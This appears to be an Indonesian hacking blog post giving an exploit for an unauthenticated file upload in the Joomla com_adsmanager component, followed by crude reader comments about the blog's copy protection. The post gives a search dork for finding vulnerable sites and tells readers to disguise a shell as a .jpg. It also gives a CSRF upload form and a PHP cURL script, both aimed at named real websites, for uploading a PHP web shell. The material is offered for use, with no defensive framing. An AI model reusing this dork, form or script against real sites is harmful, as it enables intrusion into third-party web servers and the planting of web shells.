Joomla Com_Adsmanager Vulnerability





#- Dork : inurl:com_adsmanager

#- Exploit : /index.php?option=com_adsmanager&task=upload&tmpl=component

#- Vulnerable :
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}

*Note : Jangan lupa Edit Shellnya Shell.jpg

POC : 

With CSRF / Uploadify 

CSRF :

<form method="POST" action="http://www.muslimbizads.com/index.php?option=com_adsmanager&task=upload&tmpl=component"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

Uploadify : 

<?php
$url = "http://shelbygrossman.com/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php"; // put URL Here$post = array(       "file" => "@jiwax.jpg",       "name" => "jiwa.php");$ch = curl_init ("$url");curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt ($ch, CURLOPT_POST, 1);@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);$data = curl_exec ($ch);curl_close ($ch);echo $data;
?>




#- Shell Result : Here !
Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)
Open My Youtube Channel
Previous
This is the oldest page

2 komentar

Click here for komentar
Fahmi Cybers
admin
31 October 2016 at 04:18 ×

"Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)"

mikir dikit lah
bilang saya tidak meminta satu rupiah pun dari anda tapi di pasang one click ads
bilang jika ingin copy- paste tolong sertakan link sumber ehh kontol artikel lu gak bisa di copy gblk
hapus aja nih blog kalo ngeshare poc tapi di aktifin anti copy paste
:) gak guna kntl

Reply
avatar
3xploi7 Team
admin
12 November 2016 at 20:01 ×

Mohon maaf atas kekurangannya. Dulu sesudah artikel ini di publish memang blm di pasang anticopas, baru beberapa bulan kemudian karena ada AGC makanya di pasang anti copas. Anda pemain baru ya ? mending diam saja tolong di jaga dek omongannnya. Kalo blog ini gak guna kok masih nengok ilmu kesini ? btw adek marah ya, karna gak bisa KOPAS blog ini ? wkwk. Makasih sarannya :)

Reply
avatar
Thanks for your comment